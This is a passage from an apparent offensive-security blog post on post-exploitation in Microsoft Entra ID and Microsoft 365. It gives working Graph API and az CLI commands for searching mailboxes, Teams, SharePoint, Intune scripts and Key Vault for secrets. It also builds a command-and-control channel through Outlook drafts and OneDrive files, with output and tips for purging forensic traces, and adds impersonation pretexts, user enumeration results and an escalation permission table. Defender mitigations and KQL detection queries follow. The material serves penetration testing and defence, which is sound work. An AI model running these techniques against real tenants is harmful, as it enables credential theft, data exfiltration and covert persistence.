Practical test: grab a token (roadtx, TokenTacticsV2, browser cookie extraction, whatever). Hit a CAE-enabled endpoint like https://graph.microsoft.com/v1.0/me/messages and confirm it works. Now change the user's password or disable the account. Try the same request again. If CAE is active, you should get a 401 with a claims challenge within a few minutes. Then hit a non-CAE endpoint (or use the token with a tool that doesn't handle claims challenges) and watch it keep working until the token naturally expires. That gap is your window.
Check which users have long-lived sessions:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/auditLogs/signIns?`$filter=createdDateTime ge 2024-01-01&`$orderby=createdDateTime desc&`$top=50"
Once you've figured out where the CA gaps are, the rest is just execution. Graph API is where the real post-exploitation happens.
Graph API abuse: post-exploitation
You have access, persistence, and you've dealt with the CA controls. Now you actually do something with it. Graph API is your Swiss army knife for post-exploitation. Everything in Microsoft 365 is accessible through it: email, files, Teams messages, calendar, contacts, Intune policies. This is where the engagement goes from "we proved we could get admin" to "here's what an attacker would actually steal."
Reading mailboxes
With Mail.Read or Mail.ReadWrite (delegated or application), you can read anyone's email. The first thing I search for: passwords, credentials, API keys.
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/messages?`$search=%22password%22&`$select=subject,from,receivedDateTime&`$top=25"
# Search for common credential patterns
foreach ($term in @("password", "credential", "secret", "API key", "connection string")) {
$results = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/messages?`$search=%22$term%22&`$top=10"
Write-Output "$term`: $($results.value.Count) results"
}
You'd be surprised how often people email passwords to themselves or receive credentials in plaintext from helpdesk systems. The "New Employee" onboarding emails are goldmines.
Also check for inbox rules. Attackers (and you, if you're persisting) love creating inbox rules that forward copies of emails to external addresses or move security alerts to deleted items:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/mailFolders/inbox/messageRules"
OPSEC: Moderate. Mailbox access logs exist and data loss prevention policies may trigger on keyword searches. Unified audit log records MailItemsAccessed events if advanced auditing is enabled.
Detection: Unified audit log MailItemsAccessed events (requires E5 or advanced auditing). "New-InboxRule" or "Set-InboxRule" in Exchange audit log for rule creation. Alert on inbox rules that forward to external domains or delete security notifications.
Teams message harvesting
Requires: ChannelMessage.Read.All or Team.ReadBasic.All permission, or delegated access as a team member.
Teams messages often contain more sensitive info than email because people treat it like a casual conversation. Shared credentials, internal project details, infrastructure diagrams, that kind of thing.
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me/joinedTeams"
# Get channels in a specific team
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/teams/{team-id}/channels"
# Read messages from a channel
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/teams/{team-id}/channels/{channel-id}/messages?`$top=50"
The beta endpoint gives you more: reactions, replies, attachments. Worth using if you need the full picture.
Detection: Microsoft Graph activity logs (if enabled) show Teams message read operations. Bulk channel message reads from a single user or app are anomalous. Defender for Cloud Apps can flag unusual Teams data access patterns.
SharePoint and OneDrive
Requires: Files.Read.All or Sites.Read.All permission.
SharePoint sites and OneDrive are where the documents live. If you have Files.Read.All or Sites.Read.All, you can enumerate everything.
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/sites?search=contoso&`$select=displayName,webUrl"
# List files in a site's default document library
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/sites/{site-id}/drive/root/children"
# Search across all SharePoint for interesting files
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/search/query" -Body (@{
requests = @(@{
entityTypes = @("driveItem")
query = @{ queryString = "password OR credential OR secret" }
from = 0
size = 25
})
} | ConvertTo-Json -Depth 5)
I always search for filenames like "passwords.xlsx", "credentials.txt", "config.json", and anything in a folder called "IT" or "Infrastructure." The search query above will return matching results if they exist in indexed SharePoint content.
Detection: SharePoint unified audit log FileAccessed and FileDownloaded events. Bulk file downloads or search queries across multiple sites from a single account are anomalous. Defender for Cloud Apps flags mass download activity.
Intune policy access
Requires: DeviceManagementConfiguration.Read.All or Intune Administrator role.
If you have DeviceManagementConfiguration.Read.All, you can read Intune device configuration profiles. These sometimes contain Wi-Fi passwords, VPN configurations, certificate settings, and scripts that get deployed to devices.
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/deviceManagement/deviceConfigurations"
# List PowerShell scripts deployed via Intune
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts"
The scripts endpoint is beta-only, which is annoying but it works. Some of those scripts have hardcoded credentials in them. But just listing configs and scripts isn't the point. The point is what you find inside them.
Extract Wi-Fi passwords from configuration profiles. Wi-Fi profiles pushed through Intune often contain pre-shared keys in plaintext (or base64, which is the same thing). Pull down every Wi-Fi configuration profile and check the XML payloads. Corporate WPA2-Enterprise profiles will have certificate references, but plenty of orgs also push guest network or site-specific PSK profiles through Intune. Those passwords are sitting right there in the config.
Find VPN configurations for network access. VPN profiles contain server addresses, authentication methods, and sometimes embedded credentials or certificate references. Even without the credentials in the profile itself, knowing the VPN server address, the authentication type, and the split tunnel configuration tells you exactly how to get onto the internal network. If the VPN profile uses certificate auth and you can pull the cert from a managed device (which you can, if you also have Intune admin), you've got network access that doesn't require a username or password at all.
Check scripts for hardcoded credentials. This is the big one. Intune deployment scripts are written by IT admins who are often in a hurry and not thinking about threat models. I've seen service account passwords, API keys, SAS tokens, and database connection strings hardcoded directly in scripts that get pushed to every device. Pull every script from the deviceManagementScripts endpoint, base64-decode the scriptContent property, and grep for strings like "password", "secret", "key", and "connectionstring". You'll be surprised how often this pays off.
One gotcha: if you're using Connect-MgGraph (the Graph PowerShell SDK), the underlying client app doesn't have the DeviceManagementConfiguration.Read.All scope registered. You'll get AADSTS650053: scope doesn't exist on the resource. Use az account get-access-token instead, or register your own app. The az CLI client has the scope; the Graph SDK client doesn't.
Detection: Intune audit logs show read access to device configuration profiles and scripts. Unusual access to the deviceManagementScripts endpoint from non-Intune admin accounts is suspicious.
Key Vault secrets
Requires: Key Vault Reader or Contributor RBAC role, or a vault access policy granting Get/List on secrets.
Key Vault is where orgs are supposed to put the secrets they shouldn't hardcode. Connection strings, API keys, storage account keys, service account passwords, certificates. If you've landed a service principal or user with Key Vault access, this is one of the highest-value targets in the subscription. Enumerate every vault, list what's inside, and pull the values.
az keyvault list --query "[].{name:name, resourceGroup:resourceGroup}" -o table
# List all secrets in a vault
az keyvault secret list --vault-name TargetVault --query "[].{name:name, enabled:attributes.enabled}" -o table
# Read a secret value
az keyvault secret show --vault-name TargetVault --name SqlConnectionString --query value -o tsv
One thing that trips people up: Key Vault has two authorization models. Newer vaults use Azure RBAC (roles like Key Vault Secrets User). Older vaults use the legacy vault access policies, which are configured per-vault and don't show up in normal RBAC queries. If az keyvault secret list returns a 403, check whether the vault uses access policies instead of RBAC. You can see this with az keyvault show --name X --query properties.enableRbacAuthorization. If it returns false, the vault uses access policies and you need to be listed there explicitly.
OPSEC: Key Vault has its own diagnostic logging. If diagnostic settings are configured to send to a Log Analytics workspace, every secret read is logged with the caller's identity. Not all orgs have this enabled, but the mature ones do.
Detection: Key Vault diagnostic logs (AuditEvent category) record SecretGet and SecretList operations. Alert on secret access from unexpected principals or IP addresses. Azure Defender for Key Vault (if enabled) flags anomalous access patterns automatically.
Graph API as a C2 channel
Requires: Mail.ReadWrite (for Outlook drafts) or Files.ReadWrite (for OneDrive).
This is a trend worth paying attention to. Attackers are using Graph API as a command-and-control channel because the traffic looks identical to normal Office 365 usage. FINALDRAFT malware (documented in early 2025) uses Outlook Drafts as its C2 medium: commands go into draft emails, responses come back as drafts, nothing ever gets sent. The implant has 37 command handlers and communicates entirely through Graph API calls to the mailbox. From a network monitoring perspective, it's HTTPS traffic to graph.microsoft.com, same as every other Office 365 client in the environment.
The conceptual pattern is simple. The operator writes a command to a draft, the implant reads it and deletes it, then writes the output to a new draft:
$cmdBody = @{
subject = "task"
body = @{ contentType = "Text"; content = "whoami /all" }
isDraft = $true
} | ConvertTo-Json
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/me/messages" -Body $cmdBody -ContentType "application/json"
# Implant: poll drafts, read command, delete it
$drafts = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me/mailFolders/drafts/messages?`$filter=subject eq 'task'").value
foreach ($msg in $drafts) {
$cmd = $msg.body.content
Invoke-MgGraphRequest -Method DELETE -Uri "https://graph.microsoft.com/v1.0/me/messages/$($msg.id)"
# Execute and write result back as a new draft...
}
Both C2 patterns work. Here's the draft approach in action:
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/me/messages" -Body $cmdBody -ContentType "application/json"
# Response:
id : AAMkADQ0MTg4NTEtYjA...
subject : task
bodyPreview : whoami /all
isDraft : True
# Verified it appeared in drafts:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me/mailFolders/drafts/messages?`$filter=subject eq 'task'"
# value.Count: 1
# Deleted it:
Invoke-MgGraphRequest -Method DELETE -Uri "https://graph.microsoft.com/v1.0/me/messages/AAMkADQ0MTg4NTEtYjA..."
# 204 No Content - gone.
Standard Mail.ReadWrite permission. The OneDrive variant works the same way, just with files instead of drafts:
Invoke-MgGraphRequest -Method PUT -Uri "https://graph.microsoft.com/v1.0/me/drive/root:/c2-cmd.txt:/content" -Body "whoami /all" -ContentType "text/plain"
# Response:
name : c2-cmd.txt
size : 13
id : 00000000-0000-0000-0000-000000000000
# Implant reads the file:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me/drive/root:/c2-cmd.txt:/content"
# Returns: whoami /all
# Deleted it:
Invoke-MgGraphRequest -Method DELETE -Uri "https://graph.microsoft.com/v1.0/me/drive/items/00000000-0000-0000-0000-000000000000"
# 204 No Content - gone.
Files.ReadWrite only. Neither operation triggered anything.
Nothing ever hits the Sent folder. No email rules trigger. The three endpoints that matter: POST /me/messages (create draft with isDraft:true), GET /me/mailFolders/drafts/messages (poll for commands), and DELETE /me/messages/{id} (clean up). The Havoc C2 framework has been modified to use SharePoint document libraries and Graph API as a C2 channel designed to blend with normal Graph API traffic. Same principle: the traffic blends in with legitimate SharePoint file sync activity. If your org uses Microsoft 365 (and you do), Graph API traffic is constant background noise. Hiding C2 in that noise is genuinely hard to detect without behavioral analysis of the actual Graph operations being performed. This is where traditional network-based detection falls apart. You can't block graph.microsoft.com, and the traffic patterns look normal until you inspect the specific API calls being made.
The detection gap is worse than "hard to see on the network." Even with Microsoft's own logging, there are specific blind spots. The Unified Audit Log (UAL) records MailItemsAccessed events, but only for E5/G5 licenses with advanced auditing enabled - most orgs don't have this, and even when they do, the events have a 24-48 hour ingestion delay that makes real-time detection impossible. Graph activity logs (currently in GA) do capture the specific API endpoints called, but they log at the resource level, not the content level - you can see that someone called POST /me/messages, but not what the draft contained. The create-read-delete cycle that makes this C2 pattern work also defeats forensic recovery: deleted drafts go to the Recoverable Items folder with a 14-day retention by default, but the implant can call DELETE /me/messages/{id} followed by DELETE /me/mailFolders/recoverableitemsdeletions/messages/{id} to permanently purge them (requires a second DELETE to the recoverable items folder, which most implementations skip - this is an OPSEC improvement over FINALDRAFT). For OneDrive, the situation is similar: file version history captures uploads, but if the file is created and deleted within the same sync cycle, SharePoint's change log may not capture it at all. The practical detection approach isn't log-based - it's behavioral. You need to look for service principals or user accounts that exhibit rapid cyclical patterns on the drafts folder (many creates and deletes within minutes with no corresponding sent mail) or OneDrive paths that show high file churn with zero sharing activity. Microsoft Sentinel has hunting queries for this, but they require the Graph activity logs connector, which is a separate setup step most deployments skip.
OPSEC: Quiet. All traffic is HTTPS to graph.microsoft.com, indistinguishable from normal M365 usage. Network monitoring sees the same destination as every Outlook and Teams client in the building.
Detection: Microsoft Graph activity logs show the specific API operations (draft creation, deletion patterns). Look for cyclical create-read-delete patterns on mailbox drafts or OneDrive files. Unified audit log MailItemsAccessed and FileAccessed events if advanced auditing is enabled.
Directory data for social engineering
Requires: any valid user credentials (no special permissions needed).
Even without any special permissions, the directory data available through Graph is useful for follow-on attacks. Org charts tell you who reports to who. Calendar data shows who's out of office (good timing for impersonation). Contact lists give you the external relationships the org has.
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/manager"
# Get direct reports
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/directReports"
# Check who's out of office
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/{user-id}/mailboxSettings/automaticRepliesSetting"
"Hi, this is [CFO's name]'s assistant. She's traveling and needs you to urgently..." You get the idea. The more you know about the org structure, the more convincing the pretext.
Detection: No practical detection for standard directory reads. If you have UEBA tuned, bulk queries for manager chains, directReports, and calendar data from a single user session may flag as anomalous reconnaissance.
That's the full chain: initial access to enumeration to privilege escalation to persistence to post-exploitation. Each phase builds on the last. See the tooling reference at the end for what I use at each step.
What this looks like in practice
I ran 16 of the 19 tools from this post against my own test tenant. 14 produced usable results against current APIs. The account I tested with was a Global Administrator, so some results (full directory role enumeration, complete application credential listing) required that elevation. But the user list, group list, basic app enumeration, and external username validation all work without GA. The point here is which tools still function against real endpoints in 2026 and which ones are dead.
Case study: CVE-2025-55241 and actor tokens
This one is worth calling out because it illustrates a broader principle. CVE-2025-55241 (disclosed and patched July 2025) involved "actor tokens," an undocumented, unsigned JWT mechanism used for internal service-to-service impersonation within Microsoft's infrastructure. These tokens were never meant to be user-facing, but they were accessible. The NetIds used to identify services were sequential integers, not random UUIDs, which made brute-force enumeration feasible. An attacker could generate actor tokens for arbitrary services and impersonate them with zero authentication.
The worst part: zero logging. Actor token usage didn't appear in audit logs, wasn't subject to Conditional Access enforcement, and didn't trigger MFA. If someone had exploited this in the wild, there would have been no forensic trail. Microsoft patched it in three days (July 14-17, 2025) and confirmed no evidence of exploitation before the fix.
The lesson here isn't about this specific CVE. It's that undocumented legacy mechanisms are the real attack surface. Every cloud platform has internal plumbing that predates the current security model. When researchers find those pipes, the results tend to be ugly: no auth, no logging, no awareness that the path even exists. If you're doing security assessments, don't limit yourself to the documented API surface. The interesting stuff is in the parts that weren't supposed to be reachable.
GraphRunner's OAuth2 grant enumeration was the real surprise: it found a delegated permission grant with Application.ReadWrite.All and RoleManagement.ReadWrite.Directory.
ClientId: a1b2c3d4-5e6f-7890-abcd-ef1234567890
ConsentType: Principal
Scope: Application.ReadWrite.All RoleManagement.ReadWrite.Directory
DelegatedPermissionGrant.ReadWrite.All Directory.ReadWrite.All
Mail.ReadWrite Mail.Send Files.ReadWrite.All
That is a full tenant compromise path sitting in the OAuth grants table, waiting for anyone who bothers to look.
On the external recon side, AADInternals confirmed three user accounts exist without any credentials at all.
Invoke-AADIntUserEnumerationAsOutsider
info@contoso.onmicrosoft.com : False
admin@contoso.onmicrosoft.com : True (EXISTS)
j.smith@contoso.onmicrosoft.com : True (EXISTS)
m.jones@contoso.onmicrosoft.com : True (EXISTS)
AlexW@contoso.onmicrosoft.com : False
MeganB@contoso.onmicrosoft.com : False
user@contoso.onmicrosoft.com : False
test@contoso.onmicrosoft.com : False
Invoke-AADIntUserEnumerationAsOutsider just works. That means an attacker can validate email addresses before ever attempting a password spray. The tools are changing fast, and the gap between "works on the blog post you read" and "works against a real tenant today" is getting wider.
Quick reference: what each permission gets you
| Permission | What you can do |
|---|---|
| RoleManagement.ReadWrite.Directory | Assign yourself Global Admin. One API call. Game over. |
| AppRoleAssignment.ReadWrite.All | Grant any permission to any app. Self-grant RoleManagement, then escalate. |
| Application.ReadWrite.All | Create apps, add secrets/certs, establish persistent backdoors. |
| Mail.ReadWrite | Read/search all mail. Set up forwarding rules. Use drafts as C2 channel. |
| Files.ReadWrite.All | Read/write all OneDrive and SharePoint. Exfiltrate documents. Use as C2 channel. |
| Directory.ReadWrite.All | Modify any directory object. Create users, modify groups, change properties. |
| DeviceManagementConfiguration.ReadWrite.All | Deploy scripts to all Intune-managed devices. Run as SYSTEM. |
| User.ReadWrite.All | Modify any user. Reset passwords, change properties, disable accounts. |
| GroupMember.ReadWrite.All | Add users to any group, including role-assignable groups tied to admin roles. Sounds harmless, isn't. |
| ServicePrincipalEndpoint.ReadWrite.All | Manage SAML and WS-Fed endpoint URLs on service principals. Redirect federated authentication flows to attacker-controlled endpoints. |
| Sites.FullControl.All | Full control over all SharePoint site collections. Read, write, delete anything stored in SharePoint. |
If you find any of these on an app or service principal during enumeration, that's your escalation path. Check it first.
What defenders should actually do
If you've read this far as a defender wondering how to prevent half of it: you're more empowered than you think. Unlike on-prem AD, where every user can see the entire directory by design, Entra lets you restrict things. And there's a lot more you can do than most orgs realize.
Start here: the foundations
The single most effective control: don't let users register their own applications. Entra Admin Center, User settings, disable "Users can register applications." This one setting removes the ability for every user to create OAuth apps and request Graph API permissions. It's the foundation of half the persistence techniques in this post.
After that: restrict what default users can read via Graph. Set consent policies to require admin approval for non-verified apps. Consider disabling the Entra admin center for non-admin users (it doesn't block Graph queries, but it removes the easy browsing). Monitor service principal role assignments. Alert on new app registrations. Audit Conditional Access policy changes. And actually review your OAuth consent grants regularly.
Get visibility into what Graph API is actually doing
Enable Microsoft Graph activity logs and pipe them into your SIEM. Most of the attacks in this post hit the Graph API at some point. Without these logs, you're flying blind. You won't see token abuse, you won't see permission enumeration, you won't see data exfiltration through Graph endpoints. The logs capture which app called which endpoint with which permissions. That's exactly the signal you need. Route them through a Diagnostic Setting to Log Analytics or Sentinel and build detection rules around unusual Graph calls, especially bulk reads against directory objects or mail endpoints from service principals that shouldn't be doing that.
Critical: If you don't have Microsoft Graph activity logs streaming to your SIEM, you are blind to Graph-based C2, bulk enumeration, and post-exploitation via the API. Every technique in the "Data access and exfiltration" section -mail harvesting, Teams scraping, SharePoint searches, OneDrive C2 draft patterns -runs through graph.microsoft.com and looks identical to normal M365 traffic on the network. The only telemetry that distinguishes an attacker reading every mailbox from Outlook doing a sync is the Graph activity log. These logs are not enabled by default. You have to create a diagnostic setting in Entra and route MicrosoftGraphActivityLogs to Log Analytics or your SIEM. Until you do, you have no visibility into which users, apps, or service principals are calling which Graph endpoints, how often, or from where. Enable them.
Protect your service principals
Enable Workload Identity Protection for service principals. This is the thing most orgs skip because they think Identity Protection is just for users. It's not. Workload Identity Protection gives you risk detections and risk-based Conditional Access policies for service principals: anomalous sign-in properties, suspicious credential additions to high-privilege apps, and tokens issued from suspicious locations. If an attacker tries to backdoor an app registration or abuse a service principal, these signals light up instead of flying under the radar. You need Workload Identities Premium licenses for it, but given how much damage a compromised service principal can do, it's worth it. It directly counters the SP abuse and app registration backdoor techniques we just walked through.
Lock down your break-glass accounts
Implement Restricted Management Administrative Units (RMAUs) for break-glass accounts and privileged service accounts. A regular admin unit is just an organizational container. An RMAU is a hard security boundary. Objects inside an RMAU can only be managed by admins scoped to that specific unit. Even Global Admins can't modify, delete, or remove members unless they're explicitly assigned. This means if an attacker gets Global Admin (which, as you've seen, is very achievable), they still can't touch accounts inside an RMAU. Put your break-glass accounts there. Put your Tier 0 service accounts there. It effectively kills the classic escalation where one compromised Global Admin API call can strip protections from your most sensitive accounts. It's one of the few controls that actually holds up against a compromised Global Admin.
Conditional Access: the stuff people miss
You probably have Conditional Access policies. But there are a few specific controls that directly counter techniques in this post that most orgs haven't turned on:
Token Protection: Enable it, even if you start in report-only mode. Token Protection, covered in the Browser cookies section above, binds tokens to the device they were issued on and kills token replay from a different machine. Report-only mode lets you see what would break before you enforce it, so there's no excuse not to at least turn that on and start collecting data.
Block device code flow: If your org doesn't use device code authentication (and most don't need it beyond a few edge cases like IoT devices or CLI tools on headless systems), block it in Conditional Access. Device code phishing is one of the most effective initial access techniques right now because it bypasses MFA completely. The user authenticates on their own device with their own MFA, then hands the token to the attacker. If the flow is blocked, the attack doesn't work. Period.
Continuous Access Evaluation (CAE) strict enforcement: CAE lets Entra revoke tokens in near-real-time when conditions change, like a user getting disabled or their location changing. But the default "standard" mode is lenient: it only covers a handful of critical events and only for a limited set of Microsoft first-party apps, and you're still sitting on up to an hour of token lifetime for most scenarios. Strict enforcement mode tightens the evaluation window, reduces the grace period, and enables IP-based enforcement, so if someone steals a token and replays it from a different IP, CAE can catch it. A lot of defenders assume "we have CAE" means stolen tokens get killed instantly, but without strict mode that's not the case. Turn on strict mode for your critical apps. It directly counters token replay from different networks.
Detect the weird stuff with MDCA
Deploy Microsoft Defender for Cloud Apps (MDCA) and configure it for anomalous app behavior detection. MDCA is the E5 feature that watches what happens after someone gets in, and it works without relying on sign-in logs, which means techniques in this post that dodge Entra ID detection still have to contend with MDCA's behavioral analytics. It can spot things like: a service principal that's never accessed SharePoint suddenly downloading thousands of files, an app that normally makes 10 Graph calls a day suddenly making 10,000, OAuth apps requesting unusual permission combinations, impossible travel, and suspicious inbox rule creation. These are exactly the patterns you'd see during post-exploitation. The built-in anomaly detection policies catch a surprising amount of attack activity if you actually turn them on and tune the alerts so your SOC doesn't ignore them.
The bigger point
In AD, visibility is a feature you can't turn off. In Entra, restriction is an option many orgs don't use. But beyond restriction, there's a whole layer of detection and token-level controls that most environments haven't enabled. The attacks in this post aren't theoretical. They work against default configurations. Every control in this section makes them harder, and stacking them makes most of them impractical.
The detection notes throughout this post are useful if you know what to grep for in the portal. But if you're running Sentinel or Defender XDR, here are actual KQL queries you can deploy as analytics rules. These cover the highest-signal techniques from this post.
1. Device code flow authentication
Device code phishing is one of the most effective initial access techniques because it bypasses MFA and produces a full refresh token. Most tenants have zero legitimate device code flow usage outside a handful of service accounts. This query surfaces all of it.
SigninLogs
| where AuthenticationProtocol == "deviceCode"
| where ResultType == 0 // successful sign-ins only
| project
TimeGenerated,
UserPrincipalName,
AppDisplayName,
IPAddress,
Location = LocationDetails.city,
DeviceDetail,
ConditionalAccessStatus,
RiskLevelDuringSignIn
| order by TimeGenerated desc
2. Application credential additions
Adding a secret or certificate to an existing app registration is the most common persistence mechanism in this post. Attackers add credentials to apps that already hold high-privilege Graph permissions, then authenticate as that service principal. Alert on every instance and validate with the app owner.
AuditLogs
| where OperationName == "Update application - Certificates and secrets management"
| extend InitiatedBy_UPN = tostring(InitiatedBy.user.userPrincipalName)
| extend InitiatedBy_App = tostring(InitiatedBy.app.displayName)
| extend TargetApp = tostring(TargetResources[0].displayName)
| extend TargetAppId = tostring(TargetResources[0].id)
| extend KeyDescription = tostring(TargetResources[0].modifiedProperties)
| project
TimeGenerated,
InitiatedBy_UPN,
InitiatedBy_App,
TargetApp,
TargetAppId,
KeyDescription
| order by TimeGenerated desc
3. Directory role assignments outside PIM
If PIM is configured, all legitimate role assignments should flow through the PIM activation process. Direct "Add member to role" events that bypass PIM are either misconfiguration or an attacker assigning themselves privileges. This query filters out PIM-initiated assignments to show only direct ones.
AuditLogs
| where OperationName == "Add member to role"
| where Category == "RoleManagement"
| where InitiatedBy.app.displayName != "MS-PIM" // exclude PIM-initiated assignments
| extend InitiatedBy_UPN = tostring(InitiatedBy.user.userPrincipalName)
| extend TargetUser = tostring(TargetResources[0].userPrincipalName)
| extend RoleName = tostring(TargetResources[2].displayName)
| project
TimeGenerated,
InitiatedBy_UPN,
TargetUser,
RoleName,
Result
| order by TimeGenerated desc
4. Conditional Access policy modifications
CA policy changes are one of the highest-severity audit events in Entra. An attacker who can weaken or disable a CA policy removes the guardrails for every other technique in this post. Every modification should trigger an alert and require out-of-band confirmation from the security team.
AuditLogs
| where OperationName in (
"Update conditional access policy",
"Delete conditional access policy",
"Add conditional access policy"
)
| extend InitiatedBy_UPN = tostring(InitiatedBy.user.userPrincipalName)
| extend PolicyName = tostring(TargetResources[0].displayName)
| extend ModifiedProperties = TargetResources[0].modifiedProperties
| mv-expand ModifiedProperties
| extend PropertyName = tostring(ModifiedProperties.displayName)
| extend OldValue = tostring(ModifiedProperties.oldValue)
| extend NewValue = tostring(ModifiedProperties.newValue)
| project
TimeGenerated,
OperationName,
InitiatedBy_UPN,
PolicyName,
PropertyName,
OldValue,
NewValue
| order by TimeGenerated desc
5. Graph API C2 via mailbox drafts
The GraphRunner C2 technique uses mailbox drafts as a dead drop: create a draft with a command, read the draft for output, delete the draft to clean up. This produces a distinctive cyclical pattern in MicrosoftGraphActivityLogs. The query below looks for accounts with repeated POST/GET/DELETE operations against the messages endpoint within a sliding window, which is not normal email client behavior.
MicrosoftGraphActivityLogs
| where RequestUri has_any ("/me/messages", "/me/mailFolders/Drafts")
| where RequestMethod in ("POST", "GET", "DELETE")
| summarize
POSTs = countif(RequestMethod == "POST"),
GETs = countif(RequestMethod == "GET"),
DELETEs = countif(RequestMethod == "DELETE"),
FirstSeen = min(TimeGenerated),
LastSeen = max(TimeGenerated)
by UserId, bin(TimeGenerated, 1h)
| where POSTs >= 3 and DELETEs >= 3 // cyclical create-delete pattern
| where POSTs - DELETEs between (-2 .. 2) // roughly equal creates and deletes = cleanup
| project
UserId,
TimeGenerated,
POSTs,
GETs,
DELETEs,
FirstSeen,
LastSeen
| order by POSTs desc
What to take away from this
Everything in this post starts from one authenticated user with zero admin roles. That's the part worth sitting with. The identity plane is the perimeter now, and most Entra tenants hand every authenticated user far more visibility and capability than anyone on the defensive side realizes. The gap between "low-privilege user" and "tenant compromise" is not a chain of exotic zero-days -- it's default settings, Graph API calls, and consent flows that nobody audited. If you only remember one thing: the attacker doesn't need your credentials to own your tenant; they need one set of credentials and the defaults you never changed.
Appendix: Cloud tooling quick reference
I use different tools for different phases. Here's what I reach for and when.
| Tool | What it does | When I use it |
|---|---|---|
| ROADtools / ROADrecon | Entra enumeration, dumps directory to local SQLite for offline analysis | First thing after getting a valid account. Dump everything, analyze later. One thing worth knowing: ROADrecon is broken as of 2026. It depends on Azure AD Graph (graph.windows.net), which is now fully blocked. Every request returns 403. roadtx from the same toolkit still works because it uses Microsoft Graph. |
| AADInternals | PowerShell module for Entra exploitation: token manipulation, Golden SAML, AD Connect credential extraction, backdoor creation | Persistence and advanced attacks. The Swiss army knife for Entra-specific stuff. In 2026 testing, unauthenticated recon commands still work but authenticated commands fail on macOS due to MSOnline dependency issues. |
| GraphRunner | Post-exploitation via Graph API: mailbox search, Teams messages, file exfiltration, app manipulation | Once I have tokens and want to do data-focused post-exploitation without writing custom Graph queries. Still functional in 2026 but stale (last commit August 2023), so expect some endpoints to need manual fixes. |
| TokenTactics | Device code phishing, token manipulation, token refresh across different resource scopes | Initial access via device code phish, or converting tokens between services (e.g., Outlook token to Graph token). |
| AzureHound | Entra and Azure data collector for BloodHound, maps attack paths to admin roles | After initial access when I want to map out privilege escalation paths. Run once, query in BloodHound repeatedly. |
| MicroBurst | Azure services enumeration and post-exploitation (storage, key vaults, VMs, automation accounts) | When the engagement includes Azure IaaS/PaaS, not just Entra. Good for finding exposed storage accounts and key vaults. |
| PowerZure | Azure resource exploitation: VM command execution, key vault access, automation runbook abuse | Post-exploitation on Azure resources. Pairs well with a compromised managed identity or service principal with Azure RBAC roles. In 2026, Graph API calls fail due to legacy token handling (InvalidAuthenticationToken), but Azure subscription commands still work. |
| MFASweep | Tests which services/protocols enforce MFA for a given account | After getting valid credentials, before anything else. Find out which doors are open. |
| EntraSpray | Entra ID password spraying with smart lockout awareness and ROPC-based user enumeration | When I need to spray or validate user existence. Differentiates existing vs non-existing accounts via ROPC error codes. |
| o365spray | Python-based O365 user enumeration and password spraying | User enumeration as a separate step before spraying. Good for building a valid user list without triggering lockouts. |
| TokenTacticsV2 | OAuth token manipulation, refresh token abuse, device code phishing, FOCI token exchange | Token-focused attacks: converting tokens between resource scopes, cookie-based token theft, passkey login abuse. |
| EntraFalcon | Entra ID security assessment: misconfigurations, risky settings, policy gaps | Full posture check. Generates a report covering CA gaps, risky permissions, stale accounts, and more. In 2026 testing, device code auth flow failed and the assessment did not complete. |
| NoPrompt | Exploits OAuth consent flow gaps for token acquisition without user interaction | When testing whether apps have pre-consented scopes that can be exploited silently. |
| BloodHound CE | Attack path visualization and graph database for AD and Entra identity relationships | After AzureHound collection. Query for shortest paths to Global Admin, find unexpected privilege chains. |
A note on tooling: some of these get flagged by Defender. AADInternals especially triggers a lot of detections in environments with Defender for Identity or Defender for Cloud Apps. If you're testing in an environment with detection capabilities, expect to get caught quickly unless you're rolling your own Graph queries. Which, honestly, is what I end up doing half the time anyway. A custom PowerShell script calling Invoke-MgGraphRequest doesn't trigger the same detections as a known offensive tool.